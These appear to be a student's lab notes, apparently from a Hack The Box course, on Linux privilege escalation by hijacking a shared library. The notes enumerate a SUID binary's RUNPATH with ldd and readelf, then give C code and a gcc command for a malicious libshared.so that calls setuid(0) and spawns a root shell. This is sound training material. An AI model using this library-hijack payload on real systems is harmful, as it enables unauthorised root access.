# Enumerating non-standard shared objects - Binaries under development typically have custom libraries associated with them - As an example, let consider the below SUID binary ```bash ls -la payroll -rwsr-xr-x 1 root root 16728 Sep 1 22:05 payroll ``` - We can use [ldd](https://manpages.ubuntu.com/manpages/bionic/man1/ldd.1.html) to enumerate shared objects required by a binary or shared object - `Ldd` displays the absolute path to the object and the hexadecimal address where it is loaded into memory for each of a program's dependencies ```bash ldd payroll linux-vdso.so.1 => (0x00007ffcb3133000) libshared.so => /development/libshared.so (0x00007f0c13112000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000) /lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000) ``` - Above we see the non-standard library named `libshared.so` listed as a dependency for the `payroll` binary > let's focus our attention here - As previously mentioned, it is possible to load shared libraries from custom locations - One such setting is the `RUNPATH` configuration. Libraries in this folder are given preference over other folders - `RUNPATH` can be enumerated using [readelf](https://man7.org/linux/man-pages/man1/readelf.1.html) ```bash readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` - As shown above, this config allows the loading of libraries from the `/development` folder, which is writable by all users - This misconfig can be exploited by placing a malicious library in `/development`, which will take precedence over other folders because entries in this file are checked first (before other folders present in the config files) # Creating a malicious library - Before creating and compiling a malicious library, we need to find the function name called by the `payroll` binary ```bash ldd payroll linux-vdso.so.1 (0x00007ffd22bbc000) libshared.so => /development/libshared.so (0x00007f0c13112000) /lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000) ``` - As shown above, `payroll` calls `/development/libshared.so`, so we need to copy an existing library here ```bash cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so ``` - Now trying running `payroll` and observe errors ```bash ./payroll ./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery ``` - Based on the above, we see an error stating that `payroll` failed to find the function named `dbquery` - We can create a malicious file that includes this function as below ```c #include<stdio.h> #include<stdlib.h> #include<unistd.h> void dbquery() { printf("Malicious library loaded\n"); setuid(0); system("/bin/sh -p"); } ``` - Now compile this malicious file into a shared object ```bash gcc src.c -fPIC -shared -o /development/libshared.so ``` - Finally, execute the `payroll` binary again - We should see the message `Malicious library loaded` and get a root shell --- # Exercise - Same target as previous section - `ping` test ![[images/Pasted image 20260211195816.png]] - swap back to `htb-student` ![[images/Pasted image 20260211195902.png]] - enumerate the `payroll` binary ![[images/Pasted image 20260211200029.png]] - create malicious file ![[images/Pasted image 20260211200558.png]] - compile as `/development/libshared.so` ![[images/Pasted image 20260211200809.png]] - run `payroll` binary - we have a root shell ![[images/Pasted image 20260211201040.png]] - enumerate `glibc` version ![[images/Pasted image 20260211201046.png]]